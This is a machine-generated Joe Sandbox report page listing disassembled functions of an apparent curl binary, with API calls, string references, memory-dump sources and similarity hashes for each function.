Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$_strdupfclosefgetsisspace
String ID: %s:%d: warning: '%s' uses unquoted white space in the line that may cause side-effects!
API String ID: 374044713-2290672920
Opcode ID: ec56e98941d974c8e5db8a89ec6abeb2ae238410fa73179e3cda9473fa83bee7
Instruction ID: 5ad8a4a10d42cb876b135619586b6e6ea433f66d012b1c0cc1a9a04536d78bc6
Opcode Fuzzy Hash: ec56e98941d974c8e5db8a89ec6abeb2ae238410fa73179e3cda9473fa83bee7
Instruction Fuzzy Hash: 64311EB5A04315DFCB20DF69C4C429AB7E0AB44354F0086BFE898E7391E378D9948F49

Function 0044C410 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Mingw-w64 runtime failure:, xrefs: 0044C18D
Unknown pseudo relocation protocol version %d., xrefs: 0044C6D7
Unknown pseudo relocation bit size %d., xrefs: 0044C4FE
VirtualQuery failed for %d bytes at address %p, xrefs: 0044C403, 0044C6C3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$ VirtualQuery failed for %d bytes at address %p$Mingw-w64 runtime failure:
API String ID: 0-1068558636
Opcode ID: d10fd01870fe14f81e0e51a90619f62b5b19175d188f8650f912e3789c27b412
Instruction ID: 9b2b582a5de76401697010dde8ddb2cf1815afbdb70a5887a48ed78ee340109f
Opcode Fuzzy Hash: d10fd01870fe14f81e0e51a90619f62b5b19175d188f8650f912e3789c27b412
Instruction Fuzzy Hash: 5E71B172D022149FEB54CF68E9C469DB7F1EF44304F19816BE848AB352DB38A940CF89

Function 00402260 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

curl_getenv.CURL ref: 004022C4
strtol.MSVCRT ref: 004022E2
strlen.MSVCRT ref: 004022F6
curl_free.CURL ref: 0040230B

Strings

COLUMNS, xrefs: 004022BD

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_freecurl_getenvstrlenstrtol
String ID: COLUMNS
API String ID: 1367926438-2475376301
Opcode ID: 77a817475eab75f570f100f3af6f4be337cd514ff7ea3b746006908b05395451
Instruction ID: 3b7878dab43938c79196d9c0189e451c641d336fe196133deae101cef1d4a64a
Opcode Fuzzy Hash: 77a817475eab75f570f100f3af6f4be337cd514ff7ea3b746006908b05395451
Instruction Fuzzy Hash: C92160715047018BC7109F65C58936BB7E1EF94314F14846EDC899B3C6E3BDD886CB9A

Function 0040F880 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0040F89E
fputc.MSVCRT ref: 0040FD5B

Strings

(nil), xrefs: 0041023B

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputcstrlen
String ID: (nil)
API String ID: 3191904009-546725760
Opcode ID: 1452f7b900c97903dde5e53dea8f808ed264920980be5410d9558337e3631bd7
Instruction ID: 2fcf8a1e1cadb849d4aa5d7b722e5697c4562b31d59b28830c28be820283d282
Opcode Fuzzy Hash: 1452f7b900c97903dde5e53dea8f808ed264920980be5410d9558337e3631bd7
Instruction Fuzzy Hash: F45172716083418BC720DF28C48411AB7E0BF88764F154B7EE8E9A77D1D339ED498B86

Function 004148C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNELBASE ref: 004148E9
getsockopt.WS2_32 ref: 00414913
WSAGetLastError.WS2_32 ref: 00414943

Strings

H', xrefs: 00414923

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastSleepgetsockopt
String ID: H'
API String ID: 3033474312-3698549401
Opcode ID: 265bc824ec9e9529dfb56c0633f0494dc2bb9b778ba2a95f1c8d00590c4acdb7
Instruction ID: 2ac39e37e4f7b4ed12ca58638a2771d9d54a93823bb297691c16d28379459b97
Opcode Fuzzy Hash: 265bc824ec9e9529dfb56c0633f0494dc2bb9b778ba2a95f1c8d00590c4acdb7
Instruction Fuzzy Hash: 8F0184B19043069FD710AFB8C9887AFBBF4FF44315F00493ED89997240E7B985488B96

Function 0044C2EC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 0044C2CF
VirtualProtect.KERNELBASE ref: 0044C317
memcpy.MSVCRT ref: 0044C32D
VirtualProtect.KERNELBASE ref: 0044C357

Strings

@, xrefs: 0044C305

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ProtectVirtualmemcpy
String ID: @
API String ID: 4237922067-2766056989
Opcode ID: 80ebf242d2b05df1e2195cc238deae8d74f2987027369e4002ae462454fbbeff
Instruction ID: d0e39a60ef1fdb33a4fa5d332388225595fe12154ef05dca12e502ef603b9c0a
Opcode Fuzzy Hash: 80ebf242d2b05df1e2195cc238deae8d74f2987027369e4002ae462454fbbeff
Instruction Fuzzy Hash: FD0192B5D06305AFDB40DFA8D48459EFBF0FB48354F14881AE498E7350D374A8448B46

Function 00416780 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 004167AF
WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,00000000,?,0041686A), ref: 004167D2

Strings

Send failure: %s, xrefs: 004167ED

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastsend
String ID: Send failure: %s
API String ID: 1802528911-857917747
Opcode ID: 67c318411816a58dc5470c19db9a26490ba52a8dca24918b31c21c2c86433031
Instruction ID: 998ed6c7f76de0cc5ac9eff3c5643ecf77b1a51d43671e77da3405089cd87a9a
Opcode Fuzzy Hash: 67c318411816a58dc5470c19db9a26490ba52a8dca24918b31c21c2c86433031
Instruction Fuzzy Hash: 66114CB4A043049FC710EF6CD88869ABBE4FB48364F01896EF958C7340D774D854CB91

Function 004163E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00416490
memcpy.MSVCRT ref: 00416515

Strings

8, xrefs: 004163F3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy
String ID: 8
API String ID: 3510742995-4194326291
Opcode ID: 2cacd5a95ff5b0255d151825c7a3406a08b487cfc41098d328d02a8cd2986c86
Instruction ID: 576139e36528834d67a20844cb059f64643a5e5316cc0030eb74f69f6ea4c319
Opcode Fuzzy Hash: 2cacd5a95ff5b0255d151825c7a3406a08b487cfc41098d328d02a8cd2986c86
Instruction Fuzzy Hash: 7341D2756083158FC700DF69D48469ABBE4EF88794F05887EED88CB315E734D889CB96

Function 0040F20C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040F179
fputc.MSVCRT ref: 0040F986

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0040F153

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc
String ID: 0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-4256519037
Opcode ID: 07fcc196f7a53f796ec26296bd4fc8d02a245f30997fcdaa6a170ef5db949b50
Instruction ID: 1f8f21431b2f6624b6565ec50cf4a7505095e2add05b65d18e491079879d9084
Opcode Fuzzy Hash: 07fcc196f7a53f796ec26296bd4fc8d02a245f30997fcdaa6a170ef5db949b50
Instruction Fuzzy Hash: 804184705043058FCB34CF28D8806AAB7E1FB84318F58857FE8959B795D339ED4A8B45

Function 0040F959 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0040F153

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID: 0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 0-4256519037
Opcode ID: 754aade6c53dbd43d1ff7ad8b3bfedb7a2434ce453340e939dfa929e386bcc20
Instruction ID: cac60fd58a873313c27120237079f2623675bfd5428090f79b3f340ae7b67bd0
Opcode Fuzzy Hash: 754aade6c53dbd43d1ff7ad8b3bfedb7a2434ce453340e939dfa929e386bcc20
Instruction Fuzzy Hash: EB31A371508240DBCB308F58D840256B7E0BF84318F68487FE8956F791D339ED4B8B86

Function 0040F1AC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040F179

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 0040F153

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc
String ID: 0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 1992160199-4256519037
Opcode ID: d09eb9ab1248b5da9443bec62b6e8cfb6f60751ff111169174790e54d6ad49e4
Instruction ID: fe3c4ec47b2bf72340f1adeddd34fd162aadacbd457b813a834dc4f49e7bfc82
Opcode Fuzzy Hash: d09eb9ab1248b5da9443bec62b6e8cfb6f60751ff111169174790e54d6ad49e4
Instruction Fuzzy Hash: 0B11E9715083055BCB309F68D88426BB7D1AB84318F18487FE8D9ABBD1D239ED8A8685

Function 00413FAC Relevance: 3.2, APIs: 2, Instructions: 174sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 004143E0

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c3fb14bebf4a81d9805e79be49166ece2161c864394b3f1e5dd0ca66d9d0b155
Instruction ID: ce8834c74557c852d0be5beae080ca02b8da3d6eecb997e862f937b5c5cc9242
Opcode Fuzzy Hash: c3fb14bebf4a81d9805e79be49166ece2161c864394b3f1e5dd0ca66d9d0b155
Instruction Fuzzy Hash: A581FC71A002198BCB69CF29C8847DAB7F5BB98314F5486AAE91C9B380D7349FC5CF44

Function 00414079 Relevance: 3.1, APIs: 2, Instructions: 132networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00414216
WSAGetLastError.WS2_32 ref: 00414228

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: ea9d820091de48dafa8422bd37a0a5cf140d0d35a2e8d1b1f660339319a73c38
Instruction ID: 3115b2513b83c7614b13a4ceb12958a8f22e02b1b72f8afa1c9faab989105a05
Opcode Fuzzy Hash: ea9d820091de48dafa8422bd37a0a5cf140d0d35a2e8d1b1f660339319a73c38
Instruction Fuzzy Hash: 4151F771A002298BCB69CF29D8847DAB7F5BB98314F1485AAE91DDB344E7349EC18F44

Function 0041454C Relevance: 3.1, APIs: 2, Instructions: 108networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00414696
WSAGetLastError.WS2_32 ref: 004146A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 39a8e4afe72d18ba0bdf480ee1fbc669a66624ec07ebbd755933865d469d82d6
Instruction ID: bc5aeeae15b40f97e3d697bc31aeea8d605254bea0cc142dece59f31586b8dfd
Opcode Fuzzy Hash: 39a8e4afe72d18ba0bdf480ee1fbc669a66624ec07ebbd755933865d469d82d6
Instruction Fuzzy Hash: FB419F71E002198BCB35DF28D9803DEB7E6BBC4710F1485ABD95997344EB389EC08E89

Function 0041458C Relevance: 3.1, APIs: 2, Instructions: 94networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00414696
WSAGetLastError.WS2_32 ref: 004146A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
Opcode ID: 875af898ad32ad3912a541c3603ef7f21283e3c897432260f7b541a560411cda
Instruction ID: 695d14e1d695e192a607c8e0c7fcb0a78106cfeae9f1662c15592d764577f08c
Opcode Fuzzy Hash: 875af898ad32ad3912a541c3603ef7f21283e3c897432260f7b541a560411cda
Instruction Fuzzy Hash: 4D318F71E002198BCB25DF28D9802DEB7F5BBC8310F5486ABD95997344DB389EC08F95

Function 00415070 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 004150D3

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 99464acef4abf91f00ab19d69b74d86496caf3c46b9351559bcc936861e7a560
Instruction ID: 6caee30180131e99cee643e1e89f980c42d242dde85fe49764f7369df3f11a75
Opcode Fuzzy Hash: 99464acef4abf91f00ab19d69b74d86496caf3c46b9351559bcc936861e7a560
Instruction Fuzzy Hash: 96310674A00605DFCB14DF29D4C4A8ABBE1FF89310F24C5AAD8988B355D734E885CB91

Function 004145C9 Relevance: 3.1, APIs: 2, Instructions: 80networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00414696
WSAGetLastError.WS2_32 ref: 004146A8

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastselect
String ID:
API String ID: 215497628-0
